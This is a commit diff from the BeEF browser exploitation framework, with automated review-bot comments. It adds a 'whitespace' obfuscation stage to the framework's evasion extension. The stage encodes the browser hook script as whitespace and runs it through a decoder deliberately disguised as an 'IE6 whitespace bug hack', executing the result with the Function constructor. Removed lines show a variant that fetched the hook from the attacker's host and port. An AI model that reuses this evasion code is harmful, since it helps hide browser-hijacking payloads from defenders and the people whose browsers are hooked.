modified whitespace evasion technique to keep it simple - modified beefjs (just one line; I didn't have much time to investigate my change, but it seems to work better with it than without it :)

Jean-Louis Huynen
2012-08-29 18:22:22 +02:00
parent 788cef08d3
commit e86712413c
4 changed files with 35 additions and 50 deletions


@@ -104,8 +104,7 @@ module BeEF
if config.get("beef.extension.evasion.enable")
evasion = BeEF::Extension::Evasion::Evasion.instance
@hook = evasion.add_bootstrapper + evasion.obfuscate(@hook)
@final_hook = ext_js_to_not_obfuscate + evasion.add_bootstrapper + evasion.obfuscate(ext_js_to_obfuscate) + @hook
@final_hook = ext_js_to_not_obfuscate + evasion.add_bootstrapper + evasion.obfuscate(ext_js_to_obfuscate + @hook)
else
@final_hook = ext_js_to_not_obfuscate + @hook
end
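Review bot: The rewritten `@final_hook` assignment in the evasion branch has no comment explaining why `@hook` moved inside the `evasion.obfuscate(...)` call, and the single long expression is hard to scan. A short comment such as `# obfuscate extension JS and hook in one pass, behind a single bootstrapper`, plus a named intermediate (`payload = ext_js_to_obfuscate + @hook`), would make the ordering readable. Which line is the new side is inferred from the hunk header (8 lines before, 7 after), because the page lost its +/- markers. The enclosing method begins and ends outside the hunk.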


@@ -16,7 +16,7 @@
beef:
extension:
evasion:
enable: true
enable: true
name: 'Evasion'
authors: ["antisnatchor"]
exclude_core_js: ["lib/jquery-1.5.2.min.js", "lib/json2.js", "lib/jools.min.js"]
@@ -26,4 +26,5 @@ beef:
beef: "beef"
Beef: "Beef"
evercookie: "evercookie"
chain: ["scramble", "minify"]
#chain: ["scramble", "minify"]
chain: ["minify", "base64", "whitespace"]
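Review bot: The superseded value is left behind as the commented-out line `#chain: ["scramble", "minify"]` directly above the new `chain:` entry, with nothing to say whether it is dead or a supported alternative. Either delete it and rely on history, or label it, e.g. `# alternative chain (no bootstrapper needed): ["scramble", "minify"]`, if that is in fact the distinction. The `enable: true` line in the first hunk appears to change only whitespace.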


@@ -30,3 +30,4 @@ require 'extensions/evasion/helper'
require 'extensions/evasion/obfuscation/scramble'
require 'extensions/evasion/obfuscation/minify'
require 'extensions/evasion/obfuscation/base_64'
require 'extensions/evasion/obfuscation/whitespace'


@@ -20,56 +20,40 @@ module BeEF
include Singleton
def need_bootstrap
false
true
end
def get_bootstrap
# the decode function is in plain text - called IE-spacer - because trolling is always a good idea
decode_function =
"//Dirty IE6 whitespace bug hack
function IE_spacer(css_space) {
var spacer = '';
for(y = 0; y < css_space.length/8; y++)
{
v = 0;
for(x = 0; x < 8; x++)
{
if(css_space.charCodeAt(x+(y*8)) > 9)
{
v++;
}
if(x != 7)
{
v = v << 1;
}
}
spacer += String.fromCharCode(v);
}return spacer;
}"
end
def execute(input, config)
print_debug input.length
size = input.length
encoded = encode(input)
var_name = BeEF::Extension::Evasion::Helper::random_string(3)
config = BeEF::Core::Configuration.instance
hook = config.get("beef.http.hook_file")
host = config.get("beef.http.host")
port = config.get("beef.http.port")
decode_function =
"
//Dirty IE6 whitespace bug hack
#{var_name} = function (){
jQuery.get(\'http://#{host}:#{port}#{hook}\', function callback(data) {
var output = '';
var str = '//E'+'OH';
var chunks = data.split(str);
for (var i = 0; i < chunks.length; i++)
{
if(chunks[i].substring(0,4) == '----')
{
input = chunks[i].split('\\n');
input = input[0].substring(5);
for(y = 0; y < input.length/8; y++)
{
v = 0;
for(x = 0; x < 8; x++)
{
if(input.charCodeAt(x+(y*8)) > 9)
{
v++;
}
if(x != 7)
{
v = v << 1;
}
}
output += String.fromCharCode(v);
}
}
}alert(output.length);[].constructor.constructor(output)();
}, 'text');
}
#{var_name}();//EOH-----"
input = "#{decode_function}#{encoded}"
print_debug "[OBFUSCATION - WHITESPACE] Javascript has been Whitespace Encoded"
var_name = BeEF::Extension::Evasion::Helper::random_string(3)
input = "var #{var_name}=\"#{encoded}\";[].constructor.constructor(IE_spacer(#{var_name}))();"
print_debug "[OBFUSCATION - WHITESPACE] #{size}byte of Javascript code has been Whitespaced"
input
end
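Review bot: `get_bootstrap` binds the decoder source to a local `decode_function` that is never read, so the method returns the string only because the assignment is its last expression; returning the literal directly, or a frozen constant, would make that explicit. `execute` also has no comment recording that the wrapper it emits calls `IE_spacer` and so depends on `need_bootstrap` returning `true`; a line such as `# output calls IE_spacer(), which the bootstrapper from get_bootstrap must define first` would document the coupling. For readers on the detection side, the emitted stub evaluates the decoded text through `[].constructor.constructor(...)`, i.e. the Function constructor, which a Content-Security-Policy without `'unsafe-eval'` refuses to run. The old/new side of each line is inferred from the hunk header and the commit title, since the page lost its +/- markers.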